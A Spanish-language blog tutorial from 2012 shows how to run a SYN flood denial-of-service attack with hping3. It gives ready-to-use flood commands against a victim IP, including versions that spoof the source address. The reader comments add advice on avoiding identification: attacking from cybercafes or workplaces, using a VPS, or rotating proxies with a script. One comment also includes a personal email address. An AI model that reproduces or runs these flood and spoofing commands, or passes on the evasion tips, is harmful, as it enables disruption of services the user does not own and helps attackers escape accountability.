Ataque DoS (SYN Flood) con Hping3

por | 24 enero, 2012

HPing es una herramienta en linea de comandos que nos permite crear y analizar paquetes TCP/IP, y como tal tiene un muchas utilidades: hacer testing de firewalls, escaneo de puertos, redes y como no… también tiene la capacidad de provocar un SYN Flood Attack mediante denegación de servicio (DoS)

El objetivo de un ataque de este tipo es el envío de peticiones de conexión TCP más rápido de lo que una máquina puede procesar, al fin de saturar los recursos y evitar que la máquina pueda aceptar más conexiones.

Para instalar la ultima versión de hping dependiendo de la distribucion que usemos haríamos:

  • En Debian y derivadas como Ubuntu y Linux Mint.

sudo apt-get install hping3

  • En Fedora

yum install hping3

  • En openSUSE

zypper install hping3

Un ataque clásico de DDoS sería el siguiente

hping3 -p 80  -S --flood ip_victima

donde :

-p 80 es el puerto que elegimos atacar

-S activa el flag Syn

--flood le indica a hping que envie los paquetes a la máxima velocidad posible

ip_victima es la ip o dominio a atacar

Si queremos que nuestra ip no sea visible podemos añadirle la opción a y la ip que vamos a falsear

hping3 -a ip_falsa -p 80  -S --flood ip_victima

o bien utilizar --rand-source con lo que se generan direcciones de origen ip al azar

Como veis en los ejemplos el testing lo he realizado sobre mi propia red…así que recordaros algo obvio, que los ataques DoS o DDoS son considerados delito en muchos países...por lo que please ser responsables con el uso que le deis.

23 pensamientos en “Ataque DoS (SYN Flood) con Hping3

  1. Pingback: Ddos | TagHall

  2. 2

    buen tutorial!!
    cuando hizo el testing sobre su propia red comprobó que la dirección ip de donde provenía el ataque era la falsa que usted había puesto?

    Responder
  3. mario

    que buen tutorial lo hice como dijiste pero al final se alento mi red a que se debio amigo?

    Responder
    1. Pidy

      A mi me ha ocurrido algo similar. Desde una red privada, y a través de un router conectado a Internet, he lanzado el ataque desde un pc al servidor.
      El que se ha visto perjudicado ha sido el router, dejandome sin Internet mientras duraba la ejecución del hping3.
      Alguna idea?

      Responder
    2. asdasd

      A que necesitas hacer un VPS para hacer ataques jajajaja
      Una conección descente para enviar paquetes y que no te tire el internet a ti hacerlo.

      Responder
  4. Antonio

    Tened en cuenta que nunca debéis realizar ataques desde vuestro propio domicilio, ya que aunque uséis la opción de generar paquetes con valores aleatorios en el campo IP origen ocurrirá que podrían cazaros fácilmente debido a que…………………………………………………………………………… (Pensad el por que vosotros. Venga , venga dad respuestas )

    Responder
    1. Facundo

      Es facil no?
      Debido a que lo de (–rand-source) hace un «random» de las IP privadas por ejemplo: si el rango és 192.168.1.X 255.255.255.0-> lo que ara sera randoms de 192.168.1.1 a 192.168.1.254 (sin la addr. de red ni la de brodcast).
      Por lo tanto estamos hablando de un random de IP’s privadas.
      Pero quando los paquetes salen de la LAN osea a l’exterior, se assigna la IP pública, que esta siempre sera la misma osea que los LOGS del servidor que as echo el flood saldra TU IP PUBLICA (cada paquete la misma) con diferntes IP PRIVADAS.
      Osea esto solo tendira sentido hacerlo en un lugar no sea tu casa por ejemplo un cyber, empresa, classe.(asi no se sabria quien ha echo el DoS)
      Tengo razon?
      Perdon por las faltas de ortografia, en la clase solo que que ago es leer pdf relacionadas en seguridad informatica, gano por un lado y pierdo por lotro, no me arrepiento, la informatica és fascinante si te gusta el tema passa horas con el by facundo jejejej bye.

      Responder
  5. Oswald

    Debido a que haces NAT atraves de una IP publica que te asigna tu ISP, la cual siempre es la misma, sin importar que cambies la IP origen dentro de la red.

    Responder
    1. portaro

      Y cual seria la solución a que el ISP reconociera el ip origen al ser unico y no configurable? los DDoS que ano***** hace entonces son peligrosos para los que utilizan Loic?

      Responder
    1. Facundo

      Sí, yo lo probado con un servidor que tengo en Rusia, tienes que hacer un Scrip con bash , que este vinculado en un archivo .txt lleno de proxys y hacer que en cada 10000paquetes hace un random, un scrip senzillo.
      Saludos

      Responder
  6. Angel Dario

    Hola estoy haciendo un proyecto de fin de master en Vulnerabilidades del DNS y me gustaria saber si me pueden enviar algun material que tenga disponible de como evitar este tipo de ataques y como destectar que estamos bajo este tipo de ataque, agradecería mucho si me pueden ayudar. Gracias mi e-mail es dariowins@gmail.com

    Responder
    1. Raymer Urdaneta

      si te pasaron esa información, sera que me la podrías suministrar a mi? estoy presentando ataques de este tipo y no se como pararlos o aunque sea mitigarlos

      Responder
  7. Leandro

    hping3> hping3 -p 80 127.0.0.1
    [open_sockraw] socket(): Operation not permitted
    [main] can’t open raw socket
    child process exited abnormally

    Entrare como root para ver

    Responder
  8. ping!

    me pasa lo mismo, lanzo el flood, y me bota el internet :S cual es el chiste?

    Responder
    1. Facundo

      Deves usar el –flooder o algo asi, lo que passa que el router se botea porque lo ponnes a full, tienes que reducir los paqutes therts e l’interval para que funcione.

      Responder
  9. pito

    Yo tengo un vps de la empresa CloudSigma que es gratuito y pongo el comando para descargar hping3 y cuando lo quiero usar me dice como si no existiera el comando,¿Que hago?

    Responder

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.